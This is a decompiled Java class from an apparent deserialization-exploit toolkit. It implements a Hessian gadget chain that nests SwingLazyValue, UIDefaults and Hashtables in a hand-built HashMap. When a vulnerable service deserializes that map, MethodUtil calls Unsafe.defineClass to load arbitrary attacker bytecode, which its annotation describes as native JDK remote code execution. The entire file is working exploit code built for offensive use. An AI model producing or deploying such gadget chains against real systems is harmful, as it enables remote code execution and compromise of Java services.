package com.ar3h.chains.gadget.impl.hessian.jdk;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.Reflections;
import com.vaadin.shared.JsonConstants;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.security.ProtectionDomain;
import java.util.HashMap;
import java.util.Hashtable;
import javax.swing.UIDefaults;
import sun.misc.Unsafe;
import sun.reflect.misc.MethodUtil;
import sun.swing.SwingLazyValue;

@GadgetAnnotation(name = "MethodUtil JDK原生链", description = "本链利用 sun.reflect.misc.MethodUtil 通过调用 Unsafe的defineAnonymousClass 方法加载任意字节码，实现原生JDK RCE，但是JDK可能会崩，实战慎用", dependencies = {"jdk < 11"}, priority = 40)
@GadgetTags(tags = {Tag.HessianDeserialize}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/jdk/SwingLazyValueMethodUtil.class */
public class SwingLazyValueMethodUtil implements Gadget {
    public Object getObject(String str, byte[] bArr) throws Exception {
        Object method = MethodUtil.class.getMethod("invoke", Method.class, Object.class, Object[].class);
        Method declaredMethod = Unsafe.class.getDeclaredMethod("defineClass", String.class, byte[].class, Integer.TYPE, Integer.TYPE, ClassLoader.class, ProtectionDomain.class);
        declaredMethod.setAccessible(true);
        Field declaredField = Unsafe.class.getDeclaredField("theUnsafe");
        declaredField.setAccessible(true);
        Object[] objArr = {"abc", new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", new Object[]{method, new Object(), new Object[]{declaredMethod, declaredField.get(null), new Object[]{str, bArr, 0, Integer.valueOf(bArr.length), null, null}}})};
        Object[] objArr2 = {"ccc", new SwingLazyValue(str, (String) null, new Object[0])};
        UIDefaults uIDefaults = new UIDefaults(objArr);
        UIDefaults uIDefaults2 = new UIDefaults(objArr);
        UIDefaults uIDefaults3 = new UIDefaults(objArr2);
        UIDefaults uIDefaults4 = new UIDefaults(objArr2);
        Hashtable hashtable = new Hashtable();
        Hashtable hashtable2 = new Hashtable();
        Hashtable hashtable3 = new Hashtable();
        Hashtable hashtable4 = new Hashtable();
        hashtable.put("a", uIDefaults);
        hashtable2.put("a", uIDefaults2);
        hashtable3.put(JsonConstants.VTYPE_BOOLEAN, uIDefaults3);
        hashtable4.put(JsonConstants.VTYPE_BOOLEAN, uIDefaults4);
        return serObj(hashtable, hashtable2, hashtable3, hashtable4);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject(gadgetContext.getString(ContextTag.CLASS_NAME_KEY), (byte[]) gadgetChain.doCreate(gadgetContext));
    }

    static HashMap<Object, Object> serObj(Object obj, Object obj2, Object obj3, Object obj4) throws Exception {
        Class<?> cls;
        HashMap<Object, Object> hashMap = new HashMap<>();
        Reflections.setFieldValue(hashMap, "size", 4);
        try {
            cls = Class.forName("java.util.HashMap$Node");
        } catch (ClassNotFoundException e) {
            cls = Class.forName("java.util.HashMap$Entry");
        }
        Constructor<?> declaredConstructor = cls.getDeclaredConstructor(Integer.TYPE, Object.class, Object.class, cls);
        declaredConstructor.setAccessible(true);
        Object newInstance = Array.newInstance(cls, 4);
        Array.set(newInstance, 0, declaredConstructor.newInstance(0, obj, obj, null));
        Array.set(newInstance, 1, declaredConstructor.newInstance(0, obj2, obj2, null));
        Array.set(newInstance, 2, declaredConstructor.newInstance(0, obj3, obj3, null));
        Array.set(newInstance, 3, declaredConstructor.newInstance(0, obj4, obj4, null));
        Reflections.setFieldValue(hashMap, "table", newInstance);
        return hashMap;
    }
}
